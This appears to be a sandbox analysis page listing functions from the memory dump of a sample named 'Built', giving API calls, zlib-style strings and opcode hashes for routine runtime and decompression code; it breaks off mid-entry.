Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: a497083f80058113b1f8584c5be63a6774796f2cb0a83ccd19c71a0369f9f8ab
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: 52315136618B8286DB60CF25EC402AE73A4FB89754F540136EA8D87B99EF3DD155CB02

Function 00007FF6266618E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF626661930
FindFirstFileExW.KERNEL32 ref: 00007FF626661A3A

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction ID: 734c62f0ad5f04801d570b3fb5f6f8de8eb7da419233af1154954f4c061cf61f
Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction Fuzzy Hash: 58B1B522F1869741EE609B2AED101BDA390FB44BE4F445131EA5E87B85EE3EE445DB03

Function 00007FF626665EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF626665F1A

Part of subcall function 00007FF626665668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666567C

_get_daylight.LIBCMT ref: 00007FF626665F2B

Part of subcall function 00007FF626665608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666561C

_get_daylight.LIBCMT ref: 00007FF626665F3C

Part of subcall function 00007FF626665638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666564C

Part of subcall function 00007FF62665A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
Part of subcall function 00007FF62665A9B8: GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62666617C), ref: 00007FF626665F63

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction ID: 643c3a2fa5c58860cd54c0ea30182ad44a7f2ba777dd2e4a7e05ff81bd42bf5e
Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction Fuzzy Hash: 4E51A232A0864386EB10DF32FD915A96760FB88784F444136EA4DC76A6DF3EE4449F83

Function 00007FF62664D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF62664D0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF62664D0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF62664D0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF62664D0D6

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: 6fc467765ade9874935bc0f7b78c5c82d42c8f3ba605ebb62a0b7e8d01ab5b70
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: 86111C26B14B06CAEF00CB60EC552B933A4FB19758F440E31DA6D867A4DF7DD1689782

Function 00007FF626663C80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF626663CE6
memcpy_s.LIBCPMT ref: 00007FF626663D11

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: d193b5daf2bfbb13153529730f29830c28af85d347469e336b8422afdf954569
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: 20C1E172B1828687EB248F19B44467AB7A1F794B84F449135DB5E93B84DF3EE801CB42

Function 00007FF62664A4E4 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

, xrefs: 00007FF62664A5CB
unknown header flags set, xrefs: 00007FF62664A535
header crc mismatch, xrefs: 00007FF62664A991

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction ID: 1f68ed19e9d90ac1b67d8b418a085532e6d9819677261bf8598c605b67af64fa
Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction Fuzzy Hash: A0F1A472A183D55BEBB58F19C898B3A3AA9FF44740F054538DA4987394CF7BE440EB42

Function 00007FF626669798 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF6266699E7
RaiseException.KERNEL32 ref: 00007FF6266699F8

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction ID: a5663bedfefa5d2f26facb7fbaf1c439fcf7abc20f0f921dc357f90239479241
Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction Fuzzy Hash: 00B13977A04B868BEB19CF29D84636837E0F744B48F188A25DE5D877A4CF3AD451DB02

Function 00007FF626653A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF626653DC4
, xrefs: 00007FF626653B82

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction ID: ccc804700d15148b60ed1c12024c5cfbcb35362ff1e0d5c84bef7ba33b1d3618
Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction Fuzzy Hash: 07E1C83290864682DF689F15C95213D33A0FF55F48F184235DA4EA7696EF2BE851EF03

Function 00007FF62664A34B Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 00007FF62664A4B2
incorrect header check, xrefs: 00007FF62664A4CB

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction ID: 53dba3c308eddc2d84e8eb3197df3f32094ffb025228cd17243cba25186919c0
Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction Fuzzy Hash: EF918772A182C687EBB58A14D858B7E3A99FB44350F114139DA4AC6784DF7AE940EF03

Function 00007FF62665DF60 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF62665E06D
gfff, xrefs: 00007FF62665E0EA

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction ID: b55b079ea2d24342d73db87b6f4530fba7eb14e0d476e4d61366e5f1273bb81c
Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction Fuzzy Hash: 74515A62B182C686EF248F759C427696791F744B94F488232CB9887AC6CE3FE0449B43

Function 00007FF626660938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction ID: f749e03b52842584317245e5b718a65b994ad0f71055c28594de600448abe60a
Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction Fuzzy Hash: 8402FF21A1D69341FE61AB22FE412793694BF45BA0F458634DD5DC63E2DE3FE800AB03

Function 00007FF62665DACC Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF62665DE0E

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: e1271480f7de2d20af6a1b71abed20b30e1af23441b6a010f77ef39178c99f09
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 4FA12662A087C686EF21CF25A8417A97B95FB64784F048131DE8D877D6DE3ED501DB03

Function 00007FF626658804 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF626658823

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction ID: 2d0f4da0723077baa574c4393a03c100a102fd45134e109de713061b3ab6f0f8
Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction Fuzzy Hash: DC51A311F1826651FE64AA2B9D0217A6290BF85BC4F484139DE0EC7BD7EE3FE4056B03

Function 00007FF6266634F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6266634F4

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction ID: 2b8bed1297a1ff26358c6ca539f8d0c433596a6cbd45a9b850731e1f6d1894ea
Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction Fuzzy Hash: CAB09220E07A03C2EE082B61AC9222822A87F48700F980138C00C90330DE2D20F96B43

Function 00007FF626653610 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction ID: e9edd9a2c1fe07fb84750fe04bc5ee9b085bd315d3552e46a231995c3ae85282
Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction Fuzzy Hash: E6D1CA66E0864285EF688E25C85227D2790FB45F48F184235CE0DA7796EF3BE845EB43

Function 00007FF626649870 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction ID: 4efda2bc065f6658802184cd84fb32e458fde9f34bccc7cc0d4c53d86a449c1b
Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction Fuzzy Hash: 8BC1C0722181E08BD299EB29E8794BA73D0F78930DB95406BEF87477C5CB3CA414EB11

Function 00007FF626652C80 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction ID: 72a90f9b16f79b454485f25f5390a746379fce25e24845c33670c42e4b411295
Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction Fuzzy Hash: ADB15E72A0878585EB658F39D89123C3BA8FB45B48F284235DB4D87396CF3AD441EB47

Function 00007FF62665E5E0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction ID: 96ecc4420906cd48cd4064313f895f2b299f377c484bee3c5057c8e2471c3505
Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction Fuzzy Hash: AE81E272A0878146EF74CB5AA88237A6A91FB457D4F104235DB8D83B96CE3EE4009F43

Function 00007FF626666488 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
Instruction ID: 73537bc37bd9c662927306bde52ae00e1c45453b88fb7e8e347bc44734eb82c6
Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
Instruction Fuzzy Hash: 9061B232E0C29346FF648A29B85567D6681BF81760F354239DA1DC66D6DE7FE800AF03

Function 00007FF626651DC4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: eda508185f91e23422a89d74e59e0ffe499d4000cd3b909bad58fc9872b4b5f8
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 30519936A1865286EB248B29D84123877A0FB45F58F244131DE4D87B96CF3BEC43DB42

Function 00007FF6266519B4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
